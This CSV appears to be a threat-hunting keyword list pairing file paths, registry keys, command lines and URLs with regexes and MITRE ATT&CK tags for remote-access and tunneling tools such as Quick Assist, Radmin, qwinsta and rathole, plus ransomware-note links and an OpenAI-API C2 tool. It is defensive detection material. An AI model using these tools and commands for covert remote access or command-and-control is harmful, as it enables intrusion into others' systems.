"*\SOFTWARE\Microsoft\Tracing\Quick Assist Installer*",".{0,1000}\\SOFTWARE\\Microsoft\\Tracing\\Quick\sAssist\sInstaller.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\WindowsApps\MicrosoftCorporationII.QuickAssist_*",".{0,1000}\\WindowsApps\\MicrosoftCorporationII\.QuickAssist_.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*\WinSxS\amd64_microsoft-windows-quickassist_*",".{0,1000}\\WinSxS\\amd64_microsoft\-windows\-quickassist_.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*<Provider Name='Quick Assist'/>*",".{0,1000}\<Provider\sName\=\'Quick\sAssist\'\/\>.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*>Quick Assist Component<*",".{0,1000}\>Quick\sAssist\sComponent\<.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*Assistencia Rapida Installer.exe*",".{0,1000}Assistencia\sRapida\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*Command: beginsharing Result: {""responsename"":""beginsharing""*",".{0,1000}Command\:\sbeginsharing\sResult\:\s\{\""responsename\""\:\""beginsharing\"".{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*contactsupportrelays4-prod.eastus.cloudapp.azure.com*",".{0,1000}contactsupportrelays4\-prod\.eastus\.cloudapp\.azure\.com.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*https://rdprelay*.support.services.microsoft.com*",".{0,1000}https\:\/\/rdprelay.{0,1000}\.support\.services\.microsoft\.com.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*https://remoteassistance.support.services.microsoft.com/*",".{0,1000}https\:\/\/remoteassistance\.support\.services\.microsoft\.com\/.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","1","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*Incoming cmd Message: {""command"":""beginsharing""*",".{0,1000}Incoming\scmd\sMessage\:\s\{\""command\""\:\""beginsharing\"".{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*Info: {""command"":""forwardtoagent"", ""context"":{""command"":""requestresponse"",""context"":{""responsename"":""beginsharing*",".{0,1000}Info\:\s\{\""command\""\:\""forwardtoagent\"",\s\""context\""\:\{\""command\""\:\""requestresponse\"",\""context\""\:\{\""responsename\""\:\""beginsharing.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*Info: {""command"":""rdp_native_event"", ""context"":{ ""eventname"":""rdp_native_relay_connection_succeeded""} *",".{0,1000}Info\:\s\{\""command\""\:\""rdp_native_event\"",\s\""context\""\:\{\s\""eventname\""\:\""rdp_native_relay_connection_succeeded\""\}\s.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*QuickAssist.exe launched*",".{0,1000}QuickAssist\.exe\slaunched.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*SOFTWARE\Microsoft\QuickAssist*",".{0,1000}SOFTWARE\\Microsoft\\QuickAssist.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*Szybka pomoc Installer.exe*",".{0,1000}Szybka\spomoc\sInstaller\.exe.{0,1000}","greyware_tool_keyword","QuickAssist","Sharing remote desktop with Microsoft Quick assit","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://apps.microsoft.com/detail/9p7bp5vnwkx5","1","0","N/A","Quick assist could be preinstalled in some Windows versions","10","10","N/A","N/A","N/A","N/A"
"*cmd /c *qwinsta*",".{0,1000}cmd\s\/c\s.{0,1000}qwinsta.{0,1000}","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A"
"*cmd.exe*qwinsta*",".{0,1000}cmd\.exe.{0,1000}qwinsta.{0,1000}","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A"
"*qwinsta /server:*",".{0,1000}qwinsta\s\/server\:.{0,1000}","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A"
"*/Radmin.exe*",".{0,1000}\/Radmin\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Radmin_Server_*.msi*",".{0,1000}\/Radmin_Server_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Radmin_Viewer_*.msi*",".{0,1000}\/Radmin_Viewer_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Radmin_VPN_1.*.exe*",".{0,1000}\/Radmin_VPN_1\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/rserver3.exe*",".{0,1000}\/rserver3\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*_Radmin_3.*.zip*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}_Radmin_3\..{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Radmin*",".{0,1000}\\AppData\\Roaming\\Radmin.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Radmin.exe*",".{0,1000}\\Radmin\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RADMIN.EXE-*.pf*",".{0,1000}\\RADMIN\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Radmin\radmin.rpb*",".{0,1000}\\Radmin\\radmin\.rpb.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Radmin_Server_*.msi*",".{0,1000}\\Radmin_Server_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Radmin_Viewer_*.msi*",".{0,1000}\\Radmin_Viewer_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Radmin_VPN_1.*.exe*",".{0,1000}\\Radmin_VPN_1\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rserver3.exe*",".{0,1000}\\rserver3\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rsetup64.exe*/stop*",".{0,1000}\\rsetup64\.exe.{0,1000}\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rsl.exe /setup*",".{0,1000}\\rsl\.exe\s\/setup.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\rsl.exe*/stop*",".{0,1000}\\rsl\.exe.{0,1000}\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\Radmin Server *",".{0,1000}\\Start\sMenu\\Programs\\Radmin\sServer\s.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\Radmin Viewer *",".{0,1000}\\Start\sMenu\\Programs\\Radmin\sViewer\s.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SysWOW64\rserver30\FamItrf2*",".{0,1000}\\SysWOW64\\rserver30\\FamItrf2.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SysWOW64\rserver30\FamItrfc*",".{0,1000}\\SysWOW64\\rserver30\\FamItrfc.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Windows\SysWOW64\rserver30\*",".{0,1000}\\Windows\\SysWOW64\\rserver30\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Famatech Corp.<*",".{0,1000}\>Famatech\sCorp\.\<.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A"
"*download.radmin.com*",".{0,1000}download\.radmin\.com.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*download.radmin-vpn.com*",".{0,1000}download\.radmin\-vpn\.com.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Radmin\*",".{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Radmin\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsh advfirewall firewall add rule name=""Radmin Server *",".{0,1000}netsh\sadvfirewall\sfirewall\sadd\srule\sname\=\""Radmin\sServer\s.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\Radmin Viewer 3\*",".{0,1000}Program\sFiles\s\(x86\)\\Radmin\sViewer\s3\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*radmin /connect:*",".{0,1000}radmin\s\/connect\:.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Radmin Server V3*",".{0,1000}Radmin\sServer\sV3.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","ServiceName","10","10","N/A","N/A","N/A","N/A"
"*Radmin Viewer 3\CHATLOGS\*",".{0,1000}Radmin\sViewer\s3\\CHATLOGS\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Radmin Viewer 3\rchatx.dll*",".{0,1000}Radmin\sViewer\s3\\rchatx\.dll.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*radmin.exe* /connect:*",".{0,1000}radmin\.exe.{0,1000}\s\/connect\:.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rserver3 /start*",".{0,1000}rserver3\s\/start.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rserver3 /stop*",".{0,1000}rserver3\s\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rserver3.exe*/start*",".{0,1000}rserver3\.exe.{0,1000}\/start.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rserver3.exe*/stop*",".{0,1000}rserver3\.exe.{0,1000}\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Settings for Radmin Server.lnk*",".{0,1000}Settings\sfor\sRadmin\sServer\.lnk.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Stop Radmin Server.lnk*",".{0,1000}Stop\sRadmin\sServer\.lnk.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*support.radmin.com*",".{0,1000}support\.radmin\.com.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://gofile.io/d/*",".{0,1000}https\:\/\/gofile\.io\/d\/.{0,1000}","greyware_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","downloading files from gofile.io","10","3","261","40","2024-08-28T22:39:08Z","2022-08-01T15:14:59Z"
"*https://tox.chat/download.html*",".{0,1000}https\:\/\/tox\.chat\/download\.html.{0,1000}","greyware_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","3","261","40","2024-08-28T22:39:08Z","2022-08-01T15:14:59Z"
"*https://api.openai.com/v1/files*",".{0,1000}https\:\/\/api\.openai\.com\/v1\/files.{0,1000}","greyware_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","0","1","N/A","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
"* rathole.exe",".{0,1000}\srathole\.exe","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/frpc-mem.log*",".{0,1000}\/frpc\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/frps-mem.log*",".{0,1000}\/frps\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole.exe",".{0,1000}\/rathole\.exe","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole.git*",".{0,1000}\/rathole\.git.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole/src/*",".{0,1000}\/rathole\/src\/.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole-aarch64-*",".{0,1000}\/rathole\-aarch64\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole-arm*",".{0,1000}\/rathole\-arm.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole-main/*",".{0,1000}\/rathole\-main\/.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole-mipsel-*",".{0,1000}\/rathole\-mipsel\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*/rathole-x86_64*",".{0,1000}\/rathole\-x86_64.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*\rathole.exe",".{0,1000}\\rathole\.exe","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*\rathole\src\*",".{0,1000}\\rathole\\src\\.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*\rathole-aarch64-*",".{0,1000}\\rathole\-aarch64\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*\rathole-arm*",".{0,1000}\\rathole\-arm.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*\rathole-main\*",".{0,1000}\\rathole\-main\\.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
